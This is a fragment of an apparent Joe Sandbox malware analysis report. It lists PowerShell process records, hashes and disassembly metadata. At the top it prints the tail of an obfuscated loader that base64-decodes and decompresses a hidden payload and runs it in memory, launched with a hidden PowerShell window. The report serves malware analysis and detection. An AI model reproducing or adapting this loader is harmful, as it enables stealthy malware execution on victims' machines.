System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Imagebase:0xfe0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:16
                                        Start time:02:24:46
                                        Start date:18/02/2025
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                        Imagebase:0xfe0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 00FB29F0 Relevance: .2, Instructions: 247COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1451492915.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a9de2469aa5cc3eabe866568299cb54b5c7af9a8d001c05e6745637cf69802a
                                          • Instruction ID: b103044696761497b5cd2b64c94508ed914849943b58ce67d144f983bf1afe5f
                                          • Opcode Fuzzy Hash: 8a9de2469aa5cc3eabe866568299cb54b5c7af9a8d001c05e6745637cf69802a
                                          • Instruction Fuzzy Hash: 02A18E74A002099FCB15CF59C894AEEFBB1FF88320B248569D815AB365C735ED51DFA0
                                          Function 00FB2B00 Relevance: .1, Instructions: 108COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1451492915.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f149661769a679a5ff580d0657b73e48a20b29f4a19be5d9eeb6fd47cab25070
                                          • Instruction ID: add36762a804ffe9eef033e18085e4c13b08e31b63e0658abde26882b3eb03e6
                                          • Opcode Fuzzy Hash: f149661769a679a5ff580d0657b73e48a20b29f4a19be5d9eeb6fd47cab25070
                                          • Instruction Fuzzy Hash: CF4107B4A006059FCB05CF59C498AAEFBB1FF88320B118199D815AB365C736FC51DFA0
                                          Function 00FB3110 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1451492915.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f35a9c018892fc38d07a19c143405c098acdd4b6c733122b4dccebfdefd1ca49
                                          • Instruction ID: 28735dbccb026ead7b65a7d83284c2950a69670150f1d34c50e328be4e5ec88d
                                          • Opcode Fuzzy Hash: f35a9c018892fc38d07a19c143405c098acdd4b6c733122b4dccebfdefd1ca49
                                          • Instruction Fuzzy Hash: 68213B74A006099FCB04CF5DC880AAAFBB5FF89310B15819AD819E7751C735ED41DFA1
                                          Function 00FB3100 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1451492915.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d69b48586d447032c3efc61954b01321367696f2acc172b4e58edbf96846d24a
                                          • Instruction ID: 37ccf07dcbc5ce1c43a8cb1129e96042e12f1acb02e8db276196229a9625341d
                                          • Opcode Fuzzy Hash: d69b48586d447032c3efc61954b01321367696f2acc172b4e58edbf96846d24a
                                          • Instruction Fuzzy Hash: B021F574A0060A9FCB04CF8DC880AAAFBF5FF88310B258159E809A7751C731ED51DFA0
                                          Function 00D8D01D Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1451172150.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_d8d000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f523df8d4078f71e4c1f7952655ef0a35b0f1285a69dd22773a26349759ba517
                                          • Instruction ID: 4b4d8d40095f7be12d2efa366b04221097e4b4e659bc940582060ea9e7168d4c
                                          • Opcode Fuzzy Hash: f523df8d4078f71e4c1f7952655ef0a35b0f1285a69dd22773a26349759ba517
                                          • Instruction Fuzzy Hash: 3201F2714083089BE7206A22CC80B67BF99EF85725F28C41AEC484B2C2C7799841CBB2
                                          Function 00D8D005 Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1451172150.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_d8d000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17b13c27480e9554e8e3651c3ff60336184d05917fbd3a7e53f006792e697e35
                                          • Instruction ID: 2a71513023e51757c61951b55800492bf1ab083abf091e7adadf54154420de0d
                                          • Opcode Fuzzy Hash: 17b13c27480e9554e8e3651c3ff60336184d05917fbd3a7e53f006792e697e35
                                          • Instruction Fuzzy Hash: 6701296100E3C49FD7128B258C94B52BFB49F57225F1D80DBD8888F2E3C2695849C772